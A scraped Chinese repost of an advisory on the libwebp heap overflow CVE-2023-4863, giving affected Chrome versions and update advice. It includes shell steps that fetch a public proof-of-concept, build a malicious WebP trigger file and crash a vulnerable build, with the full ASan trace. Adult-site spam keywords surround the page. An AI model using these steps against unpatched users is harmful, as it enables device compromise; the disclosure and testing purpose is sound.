在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

WebP圖像編解碼庫libwebp存在堆緩沖區溢出漏洞

哆啦安全 ? 來源:哆啦安全 ? 2023-09-25 09:48 ? 次閱讀

一、漏洞概述

WebP圖像編解碼庫libwebp存在堆緩沖區溢出漏洞(CVE-2023-4863),攻擊者可以通過發送植入惡意代碼的WebP圖像獲得設備的部分權限。

WebP是由Google開發的一種圖像格式,可為網絡圖像提供有損和無損壓縮。它旨在減小圖像的文件大小,同時不損失其視覺質量。Google Chrome是由Google開發的一款支持WebP圖像格式的網頁瀏覽器。

由于libwebp的使用范圍廣泛,不僅應用于各大瀏覽器,還包含在系統的底層庫中 (例如:Android),以及目前滿大街都是的Electron中無一例外均使用了libwebp 庫。請各位盡快更新瀏覽器及使用Electron技術的相關應用。

但CVE-2023-4863并未包含在Google即將在下月發布的10月安全更新之中 (一般 Google會提前半個月至一個月向合作廠商發布下月安全補丁,以便廠商能夠迅速修復漏洞),考慮到該漏洞已經可能有野外利用的例子,Android設備目前相對而言還是比較危險的,不知Google后續是否有額外更新計劃來緊急修復該漏洞。否則按現有更新計劃,可能就要等到11月安全補丁才會修復了。

也希望Google能夠像之前爆出藍牙漏洞時那樣,為已經停止支持的舊設備 (如 Pixel 4a) 提供計劃外安全更新。 補充:根據Mishaal Rahman老師的消息,Google有可能推出2023-10-06安全補丁等級來專門修復該漏洞,但若廠商無意更新,則還要遲至11月安全補丁才會修復。

  # checkout webp
$ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
$ cd webp_test/
  # checkout vulnerable version
$ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
  # enable AddressSanitizer
$ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
  # build webp
$ make -f makefile.unix
$ cd examples/
  # fetch mistymntncop's proof-of-concept code
$ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
  # build and run proof-of-concept
$ gcc -o craft craft.c
$ ./craft bad.webp
  # test trigger file
$ ./dwebp bad.webp -o test.png
=================================================================
==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80
WRITE of size 1 at 0x626000002f28 thread T0
#0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359)
#1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7)
#2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff)
#3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5)
#4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216)
#5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b)
#6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06)
#7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026)
#8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308
#9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d)
0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28)
allocated by thread T0 here:
#0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable
...


二、影響范圍

Google Chrome(Windows)版本 < 116.0.5845.187/.188

Google Chrome(Mac/Linux)版本 < 116.0.5845.187

三、安全措施3.1升級版本

目前該漏洞已經修復,受影響用戶可升級到以下版本:

Google Chrome(Windows)版本 >=116.0.5845.187/.188

Google Chrome(Mac/Linux)版本 >=116.0.5845.187

四、下載地址

五、手動檢查更新
可在Chrome 菜單-【幫助】-【關于 Google Chrome】檢查版本更新,并在更新完成后重新啟動。 8ec71ef2-5b2f-11ee-939d-92fbcf53809c.png ? 8eda626e-5b2f-11ee-939d-92fbcf53809c.png ? 升級后的版本號:Version 117.0.5938.92 (Official Build) (64-bit)

8eebbb68-5b2f-11ee-939d-92fbcf53809c.png

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • Android
    +關注

    關注

    12

    文章

    3959

    瀏覽量

    129299
  • Google
    +關注

    關注

    5

    文章

    1782

    瀏覽量

    58551
  • 代碼
    +關注

    關注

    30

    文章

    4882

    瀏覽量

    70075

原文標題:WebP圖像編解碼庫libwebp存在堆緩沖區溢出漏洞(升級Google Chrome瀏覽器為最新版本)

文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦
    熱點推薦

    CC++源程序緩沖區溢出漏洞的靜態檢測

    CC++源程序緩沖區溢出漏洞的靜態檢測.
    發表于 08-16 00:43

    緩沖區溢出的危害及避免緩沖區溢出的三種方法

    1. 蠕蟲病毒簡介2. 緩沖區溢出3. 緩沖區溢出舉例4. 緩沖區溢出的危害5. 內
    發表于 03-02 07:55

    緩沖區溢出的危害及避免緩沖區溢出的三種方法

    1. 蠕蟲病毒簡介2. 緩沖區溢出3. 緩沖區溢出舉例4. 緩沖區溢出的危害5. 內
    發表于 03-30 14:01

    基于中間匯編的緩沖區溢出檢測模型

    提出一種基于中間匯編的緩沖區溢出檢測模型,用于對可執行代碼進行靜態分析和檢測。采用中間匯編形式可以使算法對硬件平臺透明,增強代碼可閱讀性,有利于對緩沖區溢出
    發表于 03-29 11:10 ?20次下載

    基于狀態圖的緩沖區溢出攻擊分析

    結合緩沖區溢出攻擊產生的原理,分析緩沖區溢出攻擊代碼的結構,論述Snort規則對緩沖區溢出攻擊的
    發表于 04-10 08:46 ?32次下載

    二進制環境下的緩沖區溢出漏洞動態檢測

    提出一種在二進制環境下挖掘緩沖區溢出漏洞的方法。結合動態與靜態挖掘技術對二進制環境下的程序作進一步的漏洞查找。靜態方法主要對二進制程序中函數棧幀的特征和匯編語
    發表于 04-10 09:54 ?27次下載

    基于可執行代碼的緩沖區溢出檢測模型

    根據緩沖區溢出原理,提出一種基于可執行代碼的緩沖區溢出檢測模型,給出該模型的理論基礎,描述模型構建的過程,提出新的緩沖區引用實例的識別方法。
    發表于 04-20 09:26 ?31次下載

    二進制掃描的緩沖區溢出漏洞探測技術

    緩沖區溢出漏洞自從出現以來,一直引起許多嚴重的安全性問題,而且隨著軟件系統越做越大,越來越復雜,緩沖區溢出
    發表于 08-10 10:19 ?17次下載

    Windows緩沖區溢出攻擊的實例研究

    本文首先詳細分析了Windows 緩沖區溢出的基本原理和具體流程。在此基礎上,通過對一個Windows 網絡緩沖區溢出攻擊實例的詳細調試分析,研究了Windows
    發表于 08-28 09:44 ?17次下載

    緩沖區溢出攻擊的防護技術分析

    緩沖區溢出攻擊已經成為網絡攻擊的主要方式。本文首先分析了緩沖區溢出攻擊的基本原理,然后分析了形成緩沖區
    發表于 09-02 10:50 ?9次下載

    緩沖區溢出攻擊的原理和防范技術分析

    基于解決緩沖區溢出這一普遍發生的網絡安全漏洞的目的,通過軟件、硬件技術層面的驗證方法,結合人工檢查、靜態發現技術、動態防御技術等實驗手段,得出了在向緩沖區中傳輸數
    發表于 05-27 16:20 ?17次下載

    為什么緩沖區溢出會帶來危害?會帶來哪些危害?

    在當前網絡與分布式系統安全中,被廣泛利用的50%以上都是緩沖區溢出,其中最著名的例子是1988年利用fingerd漏洞的蠕蟲。而緩沖區溢出
    發表于 11-28 14:46 ?1.2w次閱讀
    為什么<b class='flag-5'>緩沖區</b><b class='flag-5'>溢出</b>會帶來危害?會帶來哪些危害?

    消除IoT上的緩沖區溢出漏洞

    黑客可以使用堆棧緩沖區溢出將可執行文件替換為惡意代碼,從而允許他們利用內存或調用堆棧本身等系統資源。例如,控制流劫持利用堆棧緩沖區溢出將代
    的頭像 發表于 10-12 15:25 ?1088次閱讀
    消除IoT上的<b class='flag-5'>緩沖區</b><b class='flag-5'>溢出</b><b class='flag-5'>漏洞</b>

    消除物聯網上的緩沖區溢出漏洞

      黑客可以使用堆棧緩沖區溢出將可執行文件替換為惡意代碼,從而使他們能夠利用內存或調用堆棧本身等系統資源。例如,控制流劫持利用堆棧緩沖區溢出
    的頭像 發表于 12-02 11:57 ?1172次閱讀

    緩沖區溢出漏洞的原理、成因、類型及最佳防范實踐(借助Perforce 的Klocwork/Hleix QAC等靜態代碼分析工具)

    本期來認識軟件漏洞的“常客”——緩沖區溢出,C/C++開發者尤其要注意!全面了解該漏洞的成因、類型、常見示例,以及如何借助Klocwork、Helix QAC等SAST工具進行防護。
    的頭像 發表于 03-04 16:39 ?607次閱讀
    <b class='flag-5'>緩沖區</b><b class='flag-5'>溢出</b><b class='flag-5'>漏洞</b>的原理、成因、類型及最佳防范實踐(借助Perforce 的Klocwork/Hleix QAC等靜態代碼分析工具)
    主站蜘蛛池模板: 五月婷婷一区 | 女人张开腿给人桶免费视频 | 国产三级日本三级日产三 | 日日爱网站 | 黄色avav | 永久手机看片福利盒子 | 国产精品资源在线观看网站 | 丁香婷婷激情五月 | 午夜免费啪在线观看视频网站 | 女张腿男人桶羞羞漫画 | 精品久久久久久国产免费了 | 加勒比色| 九九视频这里只有精品 | aa黄色片| 日本高清不卡视频 | 特级毛片免费视频播放 | 欧美片欧美日韩国产综合片 | 在线三级网 | 国产精品久久久精品视频 | 亚洲一区日韩一区欧美一区a | 中国特级毛片 | 亚洲一区免费观看 | 看片午夜| 婷婷色在线观看 | 国产毛片农村妇女系列 | 欧美精品影院 | 天天操天天干天天舔 | 伊人手机在线观看 | 狠狠色丁香婷婷久久综合不卡 | 成熟女性毛茸茸xx免费视频 | 国产中文99视频在线观看 | 国产毛片毛片精品天天看 | 美女张开腿露出尿口让男人桶 | 久精品视频村上里沙 | 91最新网站免费 | 久久影视免费观看网址 | 免费看黄视频网站 | 日本中文在线三级在线播放 | 欧美色爱综合 | 国产91丝袜在线播放九色 | 手机看片中文字幕 |